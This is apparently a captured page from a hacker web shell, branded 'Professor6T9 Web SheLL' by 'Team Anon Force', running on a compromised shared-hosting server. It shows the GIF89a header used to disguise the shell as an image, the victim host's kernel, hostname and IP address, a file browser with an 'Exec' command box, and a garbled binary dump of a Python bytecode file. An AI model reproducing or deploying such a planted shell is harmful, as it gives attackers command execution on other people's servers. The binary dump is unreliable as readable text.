GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
libpasteurize
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
fix_division.cpython-311.pyc
� �|oi� � �R � d Z ddlmZ ddlmZmZ d� Z G d� dej � � ZdS )z? Fixer for division: from __future__ import division if needed � )� fixer_base)�token� future_importc �t � t j }| j |k o!| j j |k o| j j |k S )zw __future__.division redefines the meaning of a single slash for division, so we match that and only that. )r �SLASH�type�next_sibling�prev_sibling)�node�slashs �r/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/libpasteurize/fixes/fix_division.py�match_divisionr sH � � �K�E��9��� F�d�&7�&<��&E�"E� F�&*�&7�&<��&E�"E�F� c � � e Zd ZdZd� Zd� ZdS )�FixDivision� c � � t |� � S )z� Since the tree needs to be fixed once and only once if and only if it matches, then we can start discarding matches after we make the first. )r )�selfr s r �matchzFixDivision.match s � � �d�#�#�#r c �&